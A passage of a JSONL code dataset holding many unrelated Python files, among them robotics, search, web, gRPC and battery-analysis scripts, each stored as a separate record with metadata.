init_x, init_y - 1\n # return(0, x - init_x)\n # else:\n # next_x, next_y = init_x + 1, init_y + np.tan(target_dir)\n\n #print(\"x,y\", x, y, init_x, init_y)\n position_dir = np.arctan2((y - init_y), (x - init_x))\n projection_dir = _normalize_angle(position_dir - target_dir)\n #print(\"yaws\", position_dir, target_dir, projection_dir)\n dist = np.sqrt(np.square(x - init_x) + np.square(y - init_y))\n # new_y = np.absolute((next_y - init_y) * init_x + (init_x - next_x) * init_y\\\n # - init_x * next_y + next_x * init_y) / \\\n # np.sqrt(np.square(next_y - init_y) + np.square(next_x - init_x))\n\n new_y = dist * np.sin(projection_dir)\n # new_x = dist * np.cos(projection_dir)\n new_x = 0\n # new_y = (y - init_y) * np.cos(target_dir) - (x - init_x) * np.sin(target_dir)\n #print(\"new y: \", new_y)\n # if (np.sin(projection_dir < 0)):\n # new_y = new_y\n\n return (new_x, new_y)\n\ndef _check_point(state, way_point):\n # Potential bug!!! Can only follow a curve that is less than\n # 180 degrees! must be deal with in the hard coded trajectory\n # or higher level planner for the time being.\n x, y, _, _, _, _ = state\n check_point_x, check_point_y, direction = way_point\n direction = np.deg2rad(direction)\n\n state_direction = np.arctan2((y - check_point_y), (x - check_point_x))\n\n intersect_angle = _normalize_angle(state_direction - direction)\n\n return np.absolute(intersect_angle) <= math.pi / 2\n # return True\n\n\ndef rollout(env, agent, way_point=[], animated=False, speedup=1,\n always_return_paths=False, renderer=None, state=np.zeros(6),\n isCurve=False, move_param=[]):\n observations = []\n actions = []\n rewards = []\n agent_infos = []\n env_infos = []\n\n path_length = 0\n\n # update initial state!!!\n # Bad implementation. Just temporary.\n env._wrapped_env._state = state\n\n # if not isCurve:\n # print(\"Start straight state: \", state)\n # tmp = modify_state_straight(state, move_param)\n # tmp_a, _ = agent.get_action(tmp)\n # print(\"Start projection: \", tmp)\n # print(\"Corresponding action: \", tmp_a)\n ttt = 20\n\n while _check_point(state, way_point):\n ttt -= 1\n # print(\"State: \", state)\n # State observation convertion\n if isCurve:\n o = modify_state_curve(state, move_param)\n else:\n o = modify_state_straight(state, move_param)\n #\n a, agent_info = agent.get_action(o)\n next_o, r, d, env_info = env.step(a)\n #\n\n print(\"Start straight state: \", state)\n print(\"Start projection: \", o)\n print(\"Corresponding action: \", a)\n print()\n\n observations.append(env.observation_space.flatten(o))\n rewards.append(r)\n actions.append(env.action_space.flatten(a))\n agent_infos.append(agent_info)\n env_infos.append(env_info)\n\n path_length += 1\n if d:\n break\n\n o = next_o\n # Bad implementation. Just temporary.\n state = env._wrapped_env._state\n\n if animated:\n render(renderer, state, a)\n #env.render()\n timestep = 0.0001\n time.sleep(timestep / speedup)\n return state\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--speedup', type=float, default=100000,\n help='Speedup')\n parser.add_argument('--render', dest='render',\n action='store_true', help='Rendering')\n parser.add_argument('--no-render', dest='render',\n action='store_false', help='Rendering')\n parser.set_defaults(render=True)\n args = parser.parse_args()\n return args\n\n\ndef move(env, policy, args, way_point, renderer,\\\n state, isCurve, move_param):\n final_state = rollout(env, policy, way_point=way_point,\n animated=args.render, speedup=args.speedup,\n always_return_paths=True, renderer=renderer,\n state=state, isCurve=isCurve,\\\n move_param=move_param)\n return final_state\n\n\ndef init_render():\n stream = open('aa_simulation/envs/model_params.yaml', 'r')\n params = yaml.load(stream)\n obstacles = []\n goal = None\n return _Renderer(params, obstacles, goal, None)\n\n\ndef _check_curve_way_point(curve_param, way_point):\n center_x, center_y, curve_angle = curve_param\n curve_angle = _normalize_angle(curve_angle)\n\n if curve_angle <= math.pi / 2:\n return curve_param, way_point\n\n check_point_x, check_point_y, direction = way_point\n\n # Construct new way point\n\n\ndef main():\n args = parse_arguments()\n profiler = cProfile.Profile()\n\n data_curve = joblib.load(\"data/roundedsquare_demo/circle.pkl\")\n policy_curve = data_curve['policy']\n env_curve = data_curve['env']\n\n data_straight = joblib.load(\"data/roundedsquare_demo/straight.pkl\")\n policy_straight = data_straight['policy']\n env_straight = data_straight['env']\n\n plt.ion()\n\n # Set fixed random seed\n np.random.seed(100)\n\n # Sample one rollout\n profiler.enable()\n\n renderer = init_render()\n\n state = [-1, 0, np.deg2rad(-90), 0, 0.5, 0]\n render(renderer, state, None)\n\n # center positin x, center position y, radius\n curve_params = [[0, 0, 1], [2, 0, 1], [2, 2, 1], [0, 2, 1]]\n # start position x, start position y, target start yaw(direction)\n straight_params = [[0, -1, np.deg2rad(0)], [3, 0, np.deg2rad(90)],\\\n [2, 3, np.deg2rad(-180)], [-1, 2, np.deg2rad(-90)]]\n # curve_step_size = [43, 44, 44, 44]\n # straight_step_size = [54, 55, 55, 56]\n\n way_points = [[0, -1, 180], [2, -1, 180], [3, 0, -90], [3, 2, -90],\\\n [2, 3, 0], [0, 3, 0], [-1, 2, 90], [-1, 0, 90]]\n\n point = 0\n for i in range(400):\n\n i %= 4\n # Turn left for 90 degrees\n point %= 8\n state = move(env_curve, policy_curve, args,\\\n way_points[point], renderer, state,\\\n True, curve_params[i])\n # print(state)\n point += 1\n\n # Move straightly for length 2\n point %= 8\n state = move(env_straight, policy_straight, args,\\\n way_points[point], renderer, state,\\\n False, straight_params[i])\n # print(state)\n point += 1\n\n profiler.disable()\n\n # Block until key is pressed\n sys.stdout.write(\"Press <enter> to continue: \")\n input()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demos/test_rounded_square.py","file_name":"test_rounded_square.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360306574","text":"import sys\nimport os\nimport urllib\nimport tarfile\nimport hashlib\n\ndef download_spark():\n bytes_written = 0\n spark_url = \"http://eecs.berkeley.edu/~jegonzal/cs186_spark.tar.bz2\"\n if not os.path.exists(\"cs186_spark.tar.bz2\"):\n print(\"Downloading Spark\")\n resp = urllib.urlopen(spark_url)\n output = open('cs186_spark.tar.bz2','wb')\n block_len = 524288\n buf = resp.read(block_len)\n while buf:\n output.write(buf)\n bytes_written += len(buf)\n buf = resp.read(block_len)\n output.close()\n return bytes_written\n \ndef unzip_spark():\n if not (os.path.isdir(\"cs186_spark\") and os.path.exists(\"cs186_spark\")):\n print(\"Extracting Spark\")\n tfile = tarfile.open('cs186_spark.tar.bz2', 'r:bz2')\n tfile.extractall()\n tfile.close()\n \ndef setup_environment():\n download_spark()\n unzip_spark()\n sys.path.append(os.path.join(os.getcwd(), 'cs186_spark', 'python', 'lib', 'pyspark.zip'))\n sys.path.append(os.path.join(os.getcwd(), 'cs186_spark', 'python', 'lib', 'py4j-0.9-src.zip'))\n os.environ[\"SPARK_HOME\"] = os.path.join(os.getcwd(), 'cs186_spark')\n\n\n \n# setup_environment()\n","sub_path":"hw5/local_install.py","file_name":"local_install.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648175617","text":"import sys\nimport os\nimport collections\n\n\ndef load_data(filepath):\n try:\n with open(filepath) as text_file:\n readed_text = text_file.read()\n return readed_text\n except IOError:\n return None\n\n\ndef get_most_frequent_words(text):\n word_list = text.split(\" \")\n just_word_list = []\n for word in word_list:\n if word.isalpha():\n just_word_list.append(word)\n counter = collections.Counter(just_word_list)\n number_words = 10\n return counter.most_common(number_words)\n\n\ndef output_words(most_frequent_words):\n for word, number in most_frequent_words:\n print(\" \",\n word,\n \" - повторяется\",\n number,\n \"раз(а)\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n exit(\"Вы не ввели путь к файла с данными\")\n file_path = sys.argv[1]\n if not os.path.isfile(file_path):\n exit(\"Такого файла не существует\")\n if load_data(file_path) is None:\n exit(\"Проблема с открытием файла\")\n\n text = load_data(file_path)\n most_frequent_words = get_most_frequent_words(text)\n output_words(most_frequent_words)\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"595542420","text":"import unittest\nimport sys\n\nfrom PyQt4 import QtGui\n\n\nclass Test_test(unittest.TestCase):\n def setUp(self):\n self.app = QtGui.QApplication(sys.argv)\n self.window = QtGui.QMainWindow()\n self.window.show()\n\n def tearDown(self):\n sys.exit(self.app.exec_())\n\n def test_login(self):\n from model.session import Session\n\n Session.authenticate(\"TestUser\", \"hello\")\n player = Session.getPlayer()\n player.setLevel(50)\n self.assertEqual(Session.getPlayer().getLevel(), 50)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python3-qt4/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174559546","text":"import numpy as np\nfrom scipy.spatial import distance\n\n\ndef pq(data, P, init_centroids, max_iter):\n M = data.shape[1]\n N = data.shape[0]\n K = init_centroids.shape[1]\n newdata = np.array(np.split(data, P, axis=1))\n codebooks = np.zeros(shape=(P, K, M // P), dtype=np.float32)\n # for each split data part\n for part in range(P):\n # update max_iter times for each part\n for times in range(max_iter):\n # for each data to calculate the distance to every center,768 data\n # 768 * 256 (every center and its distance to 768 data)\n # for each data, and its distance to 256 k\n newdis = manhattanDistance(newdata[part], init_centroids[part])\n # nearest is 1 * 768,means the nearest center to each data\n nearest = np.argmin(newdis, axis=1)\n\n for k in range(init_centroids[part].shape[0]):\n dimlist = []\n # find all the points belong to certain k and update the median\n for item in np.argwhere(nearest == k):\n # data index is item and its dim\n dimlist.append(newdata[part][item][0])\n if not dimlist:\n continue\n init_centroids[part, k] = np.median(dimlist, axis=0)\n codebooks[part] = init_centroids[part]\n\n # using the newest codebooks and do the k-means, then get the one part of codes\n codes = np.zeros(shape=(N, P), dtype=np.uint8)\n for part in range(P):\n newdis = manhattanDistance(newdata[part], init_centroids[part])\n nearest = np.array(np.argmin(newdis, axis=1), dtype=np.uint8)\n if part == 0:\n # 1 * 768 and transfer it to 768 * 1 then become N*P\n first = nearest.reshape(N, -1)\n else:\n codes = np.concatenate((first, nearest.reshape(N, -1)), axis=1)\n first = codes[:]\n\n return codebooks, codes\n\n\ndef query(queries, codebooks, codes, T):\n qsize = queries.shape[0]\n P = codebooks.shape[0]\n M = queries.shape[1]\n N = codes.shape[0]\n newquery = queries.reshape(qsize, P, M // P) # Q, P,M//P\n candidates = []\n if T >= N:\n for times in range(qsize):\n temp = set()\n for i in range(N):\n temp.add(i)\n candidates.append(temp)\n return candidates\n\n for times in range(qsize):\n # find the distance for each center to the query (P,k) matrix\n # codebooks p,k,m/p\n # newquery[times] , p,m/p\n disarray = np.array([])\n for p in range(codebooks.shape[0]):\n distance = manhattanDistance(newquery[times][p].reshape(1, -1), codebooks[p])\n if p == 0:\n # 1 * 256\n first = distance\n else:\n disarray = np.concatenate((first, distance), axis=0)\n first = disarray[:]\n # 2 * 256, the distance from one data block to all center\n nearindex = np.argsort(disarray, axis=1)\n curset = set()\n heap = []\n direction = generate(P)\n indexstart = [0] * P # for p = 2 ,it is (0,0)\n cursum = 0\n dataindex = []\n for p, v in list(enumerate(indexstart)):\n cursum += disarray[p][nearindex[p][v]]\n dataindex.append(nearindex[p][v])\n heap.append([cursum, dataindex, indexstart])\n indexset = set()\n indexset.add(tuple(indexstart))\n while len(curset) < T:\n firstdata = heap.pop(0)\n first = np.array(firstdata[1])\n indexstart = np.array(firstdata[2])\n indexlist = data_index(codes, first)\n if indexlist.size != 0:\n for item in indexlist:\n curset.add(item)\n # according to the newest element, and add one dimension then push them to heap\n for item in (indexstart + direction):\n cursum = 0\n dataindex = []\n for p, v in enumerate(item):\n cursum += disarray[p][nearindex[p][v]]\n dataindex.append(nearindex[p][v])\n tolist = item.tolist()\n totuple = tuple(tolist)\n if totuple not in indexset:\n # binary insert and do not need to sort again\n insertindex = binary_insert(heap, cursum)\n heap.insert(insertindex, [cursum, dataindex, tolist])\n indexset.add(totuple)\n candidates.append(curset)\n return candidates\n\n\ndef manhattanDistance(data1, data2):\n return distance.cdist(data1, data2, 'cityblock')\n\n\n# indexdata is the data part center,eg,[2,2]means the index of the 0 part is 2,and 1 part is 2\ndef data_index(codesdata, indexdata):\n # res = []\n # for i in range(codesdata.shape[0]):\n # if (codesdata[i, :] == indexdata).all():\n # res.append(i)\n # return res\n return np.where(np.logical_and.reduce(codesdata == indexdata, axis=1))[0]\n\n\ndef generate(dim):\n start = 1\n # add one for each dimension\n res = []\n for _ in range(dim):\n temp = list(map(int, bin(start)[2:].zfill(dim)))\n start = start << 1\n res.append(temp)\n return np.array(res)\n\n\n# return the index where to insert\ndef binary_insert(arr, num):\n l = 0\n r = len(arr) - 1\n while l <= r:\n mid = l + (r - l) // 2\n if arr[mid][0] < num:\n l = mid + 1\n else:\n r = mid - 1\n return l\n\n\n\n","sub_path":"9318/proj/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44868537","text":"\"\"\"\r\n create by Fred on 2018/8/22\r\n\"\"\"\r\nfrom flask_restful import fields\r\nfrom sqlalchemy import Column, Integer, String\r\nfrom app.entity.base import db, Base\r\n\r\n__author__ = 'Fred'\r\n\r\n\r\nclass StatStrategyRecordEntity(Base):\r\n \r\n __tablename__ = 'TB_STAT_STRATEGY_RECORD'\r\n \r\n id = Column(Integer, primary_key=True)\r\n model_id = Column(Integer, nullable=False)\r\n strategy_id = Column(Integer, nullable=False)\r\n batno = Column(String(14), nullable=False)\r\n result = Column(String(1), nullable=False)\r\n score = Column(Integer, nullable=False)\r\n\r\n marshal_fields = {}\r\n marshal_fields['id'] = fields.Integer(attribute='id')\r\n marshal_fields['model_id'] = fields.Integer(attribute='model_id')\r\n marshal_fields['strategy_id'] = fields.Integer(attribute='strategy_id')\r\n marshal_fields['batno'] = fields.String(attribute='batno')\r\n marshal_fields['result'] = fields.String(attribute='result')\r\n marshal_fields['score'] = fields.Integer(attribute='score')\r\n \r\n def __init__(self, v_model_id, v_strategy_id, v_batno, v_result, v_score):\r\n Base.__init__(self)\r\n self.model_id = v_model_id\r\n self.strategy_id = v_strategy_id\r\n self.batno = v_batno\r\n self.result = v_result\r\n self.score = v_score\r\n\r\n def __repr__(self):\r\n return '{\"id\":%r,\"model_id\":%r, \"strategy_id\": %r, \"batno\": %r, \"result\": %r, \"score\": %r}' \\\r\n % (self.id, self.model_id, self.strategy_id, self.batno, self.result, self.score)\r\n\r\n def save(self):\r\n try:\r\n db.session.add(self)\r\n db.session.commit()\r\n except Exception as e:\r\n print(\"Error: \" + e)\r\n db.session.rollback()\r\n return False\r\n return True\r\n\r\n def delete(self):\r\n try:\r\n db.session.delete(self)\r\n db.session.commit()\r\n except Exception as e:\r\n print(\"Error: \" + e)\r\n db.session.rollback()\r\n return False\r\n return True\r\n\r\n def get(self):\r\n try:\r\n return db.session.get(self.id)\r\n except Exception as e:\r\n print(\"Error: \" + e)\r\n return None\r\n","sub_path":"pyaiservice/app/entity/statstrategyqueryrecordentity.py","file_name":"statstrategyqueryrecordentity.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433808006","text":"# 1432. Max Difference You Can Get From Changing an Integer\n# vbc 25\n# 2021/12/10\n\n# Runtime: 16 ms, faster than 100.00% of Python3 online submissions for Max Difference You Can Get From Changing an Integer.\n# Memory Usage: 14.3 MB, less than 14.29% of Python3 online submissions for Max Difference You Can Get From Changing an Integer.\n\n# greedy\n# diff = amx - diff\n# in order to make the diff as big as possible, we need make the max as big as possible and min as small as possible\n# max: iterate the list from the beginning, find the first digit that is not 9, and replace it as well as all\n# occurrence by 9\n# min: we have two situations. if the first digit is not 1, replace it as well as all occurrence by 1; otherwise,\n# search the first digit that is neither 0 or 1, and replace it as well as all occurrences by 0\n\n# remarks: brute force method is interesting; string replace function is good\n\nclass Solution:\n def maxDiff(self, num: int) -> int:\n max_digits = list(str(num))\n i = 0\n while i < len(max_digits) and max_digits[i] == '9':\n i += 1\n if i < len(max_digits):\n key = max_digits[i]\n while i < len(max_digits):\n if max_digits[i] == key:\n max_digits[i] = '9'\n i += 1\n min_digits = list(str(num))\n if min_digits[0] != '1':\n i, key = 0, min_digits[0]\n else:\n i = 1\n while i < len(min_digits) and (min_digits[i] == '0' or min_digits[i] == '1'):\n i += 1\n if i < len(min_digits):\n key = min_digits[i]\n val = '0' if i > 0 else '1'\n while i < len(min_digits):\n if min_digits[i] == key:\n min_digits[i] = val\n i += 1\n return int(\"\".join(max_digits)) - int(\"\".join(min_digits))\n","sub_path":"1432. Max Difference You Can Get From Changing an Integer.py","file_name":"1432. Max Difference You Can Get From Changing an Integer.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347445131","text":"command = input()\n\nnumbers = [int(el) for el in input().split()]\n\nif command == \"Odd\":\n odd = [el for el in numbers if el % 2 == 1]\n res = sum(odd) * len(numbers)\n print(res)\nelif command == \"Even\":\n even = [el for el in numbers if el % 2 == 0]\n res = sum(even) * len(numbers)\n print(res)","sub_path":"advanced/advanced functions/even vs odd.py","file_name":"even vs odd.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528667939","text":"''' test_raw_data.py - Use this program to connect to any imu on file and output raw data.\n\n'''\n\nfrom imu_framework.tests.context import imu_tools\nfrom imu_framework.tests.context import imu_base\nfrom matplotlib import pyplot as plt\nfrom imu_framework.tests.context import RealtimePlot\n\n\n# from imu_framework.tests.context import imu_no_thrd_9250\n# from imu_framework.tests.context import imu_thrd_9250\n\n# from imu_framework.tests.context import imu_no_thrd_9250\n# from imu_framework.tests.context import imu_thrd_9250\n\n# from imu_framework.tests.context import imu_no_thrd_sparton\n# from imu_framework.tests.context import imu_thrd_sparton\n\nif __name__ == '__main__':\n\n ######## instantiate IMUs ####################################\n # myIMU_no_thrd_9250 = imu_no_thrd_9250()\n # myIMU_thrd_9250 = imu_thrd_9250()\n\n # myIMU_no_thrd_sparton = imu_no_thrd_sparton()\n # myIMU_thrd_sparton = imu_thrd_sparton()\n\n myIMU_base = imu_base()\n\n\n ######## connect all IMUs #############################################\n # myIMU_no_thrd_9250.connect()\n # myIMU_thrd_9250.connect()\n\n # myIMU_no_thrd_sparton.connect()\n # myIMU_thrd_sparton.connect()\n\n myIMU_base.connect()\n\n # fix me take all and put into tools so multipal instantiations are can be achived\n ##########################################################################\n myTools = imu_tools(imu=myIMU_base)\n\n fig, axes = plt.subplots()\n display = RealtimePlot(axes)\n\n i = 0\n print('start')\n while i <= 4999:\n\n rawAccel = myTools.get_raw_scale_data()\n\n # print(i)\n print(rawAccel)\n # myTools.dataForMatlabProcesing(rawAccel, i, 'LoggedData_CalInertialAndMag')\n\n # tcAcceleration = myTools.get_arhs_tcAccel()\n # print(tcAcceleration)\n\n # zVector = myTools.get_arhs_z_vector()\n # print(zVector)\n i = i + 1\n\n ######## disconnect all IMUs #############################################\n\n # myIMU_no_thrd_sparton.disconnect()\n print(i)\n\n\n display.animate(fig, lambda frame_index: (time.time() - start, random.random() * 100))\n plt.show()\n\n fig, axes = plt.subplots()\n display = RealtimePlot(axes)\n while True:\n display.add(time.time() - start, 100)\n plt.pause(0.001)","sub_path":"imu_framework/tests/test_raw_data.py","file_name":"test_raw_data.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593865898","text":"import cv2\nimport time\nfrom datetime import timedelta\nimport position\nimport settings\nimport a_star\nimport best_first\n\n\n# Draws the given path on the image and shows it\ndef write_path(path):\n\n while len(path) > 0:\n node = path.pop()\n x = node.position.x\n y = node.position.y\n\n settings.image[x, y] = [255, 255, 255]\n\n cv2.imshow(\"Path\", settings.image)\n cv2.waitKey(0)\n\n\n# Manage all program\ndef main():\n\n image_name = input(\"\\n> Write image name : \") # Take image path from user\n settings.image = cv2.imread(image_name) # Read the image\n if settings.image is None: # Control if image was found\n print(\" Image not found \")\n return -1\n\n print(\"\\n> Select the algorithm you want to use\")\n selection = input(\" 1) A* with heap\\n 2) A* with stack\\n 3) BestFirst with heap\\n 4) BestFirst with stack\\n >\")\n\n # Define coordinate of start and end node\n print(\"\\n Image size is (\", settings.image.shape[0]-1, \", \", settings.image.shape[1]-1, \")\")\n x = int(input(\"> Enter the x coordinates of starting position : \"))\n y = int(input(\"> Enter the y coordinates of starting position : \"))\n start = position.Position(x, y)\n x = int(input(\"> Enter the x coordinates of ending position : \"))\n y = int(input(\"> Enter the y coordinates of ending position : \"))\n end = position.Position(x, y)\n\n star = time.time()\n if selection == \"1\":\n path, count_max, count_pop = a_star.a_star_with_heap(start, end) # Find the optimum path with A* using heap\n elif selection == \"2\":\n path, count_max, count_pop = a_star.a_star_with_stack(start, end) # Find the optimum path with A* using stack\n elif selection == \"3\":\n path, count_max, count_pop = best_first.bfs_with_heap(start, end) # Find the path with Best First using heap\n elif selection == \"4\":\n path, count_max, count_pop = best_first.bfs_with_stack(start, end) # Find the path with Best First using stack\n else:\n print(\" Invalid Selection \")\n path, count_max, count_pop = None, None, None\n elapsed = (time.time() - star)\n\n if path is None:\n print(\" ERROR: Path not found or start/end coordinates not given correctly\")\n else:\n print(\"\\nExecution took: %s secs\" % timedelta(seconds=round(elapsed)))\n print(\"Maximum number of heap/stack elements : \", count_max)\n print(\"Number of pop() called : \", count_pop)\n print(\" > Image printed on your screen! \")\n write_path(path) # draw the path on the image and show it\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"artificial-intelligence-basic/path-finding-with-Astar/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98132044","text":"from blog.users.pic_handler import add_profile_pic\nimport secrets\nimport os\nfrom flask import Blueprint, render_template, request, url_for, redirect, flash, current_app\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom blog import db\nfrom blog.models import User, Post\nfrom blog.users.forms import Reg_form, Login_form, Update_User_form\nusers = Blueprint('users',__name__)\n\n#register\n@users.route('/reg', methods=['post','get'])\ndef register():\n form = Reg_form()\n if form.validate_on_submit():\n new_user = User(email=form.email.data,\n username=form.username.data,\n password=form.password.data)\n db.session.add(new_user)\n db.session.commit()\n flash('Regisration success')\n return redirect(url_for(request.args.get('next','users.login')))\n return render_template('reg.html',form=form)\n#login_view\n@users.route('/login', methods=['post','get'])\ndef login():\n form = Login_form()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user is not None and user.check_password(form.password.data):\n login_user(user)\n flash('Login success')\n return redirect(url_for(request.args.get('next','core.index')))\n else:\n flash('Invalid username or password', 'error')\n return render_template('login.html', form=form)\n\n#login_out\n@login_required\n@users.route(('/logout'))\ndef logout():\n logout_user()\n flash('Logout success')\n return redirect(url_for('core.index'))\n\n\n@login_required\n@users.route('/acc', methods=['GET', 'POST'])\ndef acc():\n form = Update_User_form()\n if form.validate_on_submit():\n if form.picture.data:\n # picture_file = save_picture(form.picture.data)\n picture_file = add_profile_pic(form.picture.data, form.username.data)\n current_user.profile_image = picture_file\n current_user.username=form.username.data\n current_user.email=form.email.data\n db.session.commit()\n flash('Account updated', 'success')\n return redirect(url_for('users.acc'))\n elif request.method == 'GET': #must be cap\n form.username.data = current_user.username\n form.email.data = current_user.email\n profile_image = url_for('static', filename='profile_img/'+current_user.profile_image)\n return render_template('acc.html', profile_image=profile_image, check=current_user.profile_image, form = form)\n\n@login_required\n@users.route('/<int:user_id>')\ndef user_posts(user_id):\n user = User.query.get_or_404(user_id)\n posts_by_users = Post.query.filter_by(author=user).order_by(Post.date.desc())\n # return render_template('user_page.html', posts_by_users=posts_by_users)\n return render_template('user_page.html', user=user, posts_by_users=posts_by_users)\n # try two\n","sub_path":"build_along/blog-project/blog/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"216448413","text":"from concurrent import futures\nimport time\nimport grpc\nfrom rpc.protoc import regular_adjustment_pb2_grpc\nfrom rpc.protoc import conditional_trigger_pb2_grpc\nfrom rpc.protoc import adjustment_and_triggering_of_portfolio_pb2_grpc\nfrom rpc.protoc import stocks_pb2_grpc\nfrom rpc.protoc import option_futures_pb2_grpc\nfrom rpc.protoc import citibank_api_pb2_grpc\nfrom rpc import RegularAdjustmentService, ConditionalTriggerService, AdjustmentAndTriggeringOfPortfolioService, \\\n StocksService, OptionFuturesService, CitibankApiService\n\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n regular_adjustment_pb2_grpc.add_RegularAdjustmentServicer_to_server(\n RegularAdjustmentService.RegularAdjustmentService(), server)\n conditional_trigger_pb2_grpc.add_ConditionalTriggerServicer_to_server(\n ConditionalTriggerService.ConditionalTriggerService(), server)\n adjustment_and_triggering_of_portfolio_pb2_grpc.add_AdjustmentAndTriggeringOfPortfolioServicer_to_server(\n AdjustmentAndTriggeringOfPortfolioService.AdjustmentAndTriggeringOfPortfolioService(), server)\n stocks_pb2_grpc.add_StocksServicer_to_server(\n StocksService.StocksService(), server)\n option_futures_pb2_grpc.add_OptionFuturesServicer_to_server(\n OptionFuturesService.OptionFuturesService(), server)\n citibank_api_pb2_grpc.add_CitibankApiServicer_to_server(\n CitibankApiService.CitibankApiService(), server\n )\n\n server.add_insecure_port('[::]:50051')\n server.start()\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == '__main__':\n serve()\n","sub_path":"RpcServer.py","file_name":"RpcServer.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401776054","text":"#!/usr/bin/env python3\n# Copyright (c) 2019 Toyota Research Institute\n\n\"\"\"\nHelper functions for generating features in beep.featurize module\nAll methods are currently lumped into this script.\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib as plt\nfrom scipy import signal\nfrom lmfit import models\nfrom scipy.interpolate import interp1d\n\n\ndef isolate_dQdV_peaks(processed_cycler_run, diag_nr, charge_y_n, max_nr_peaks, rpt_type, half_peak_width=0.075):\n \"\"\"\n Determine the number of cycles to reach a certain level of degradation\n\n Args:\n processed_cycler_run: processed_cycler_run (beep.structure.ProcessedCyclerRun): information about cycler run\n rpt_type: string indicating which rpt to pick\n charge_y_n: if 1 (default), takes charge dQdV, if 0, takes discharge dQdV\n diag_nr: if 1 (default), takes dQdV of 1st RPT past the initial diagnostic\n\n Returns:\n dataframe with Voltage and dQdV columns for charge or discharge curve in the rpt_type diagnostic cycle.\n The peaks will be isolated\n \"\"\"\n\n rpt_type_data = processed_cycler_run.diagnostic_interpolated[(processed_cycler_run.diagnostic_interpolated.cycle_type == rpt_type)]\n cycles = rpt_type_data.cycle_index.unique()\n\n ## Take charge or discharge from cycle 'diag_nr'\n data = pd.DataFrame({'dQdV': [], 'voltage': []})\n\n if charge_y_n == 1:\n data.dQdV = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 0)].charge_dQdV.values\n data.voltage = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 0)].voltage.values\n elif charge_y_n == 0:\n data.dQdV = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 1)].discharge_dQdV.values\n data.voltage = rpt_type_data[\n (rpt_type_data.cycle_index == cycles[diag_nr]) & (rpt_type_data.step_type == 1)].voltage.values\n # Turn values to positive temporarily\n data.dQdV = -data.dQdV\n else:\n raise NotImplementedError('Charge_y_n must be either 0 or 1')\n\n # Remove NaN from x and y\n data = data.dropna()\n\n # Reset x and y to values without NaNs\n x = data.voltage\n y = data.dQdV\n\n # Remove strong outliers\n upper_limit = y.sort_values().tail(round(0.01 * len(y))).mean() + y.sort_values().mean()\n data = data[(y < upper_limit)]\n\n # Reset x and y to values without outliers\n x = data.voltage\n y = data.dQdV\n\n # Filter out the x values of the peaks only\n no_filter_data = data\n\n # Find peaks\n peak_indices = signal.find_peaks_cwt(y, (10,))[-max_nr_peaks:]\n\n peak_voltages = {}\n peak_dQdVs = {}\n\n for count, i in enumerate(peak_indices):\n temp_filter_data = no_filter_data[((x > x.iloc[i] - half_peak_width) & (x < x.iloc[i] + half_peak_width))]\n peak_voltages[count] = x.iloc[i]\n peak_dQdVs[count] = y.iloc[i]\n\n if count == 0:\n filter_data = temp_filter_data\n else:\n filter_data = filter_data.append(temp_filter_data)\n\n return filter_data, no_filter_data, peak_voltages, peak_dQdVs\n\n\ndef generate_model(spec):\n \"\"\"\n Method that generates a model to fit the hppc data to for peak extraction, using spec dictionary\n :param spec (dict): dictionary containing X, y model types.\n :return: composite model objects of lmfit Model class and a parameter object as defined in lmfit.\n \"\"\"\n composite_model = None\n params = None\n x = spec['x']\n y = spec['y']\n x_min = np.min(x)\n x_max = np.max(x)\n x_range = x_max - x_min\n y_max = np.max(y)\n for i, basis_func in enumerate(spec['model']):\n prefix = f'm{i}_'\n\n #models is an lmfit object\n model = getattr(models, basis_func['type'])(prefix=prefix)\n if basis_func['type'] in ['GaussianModel', 'LorentzianModel',\n 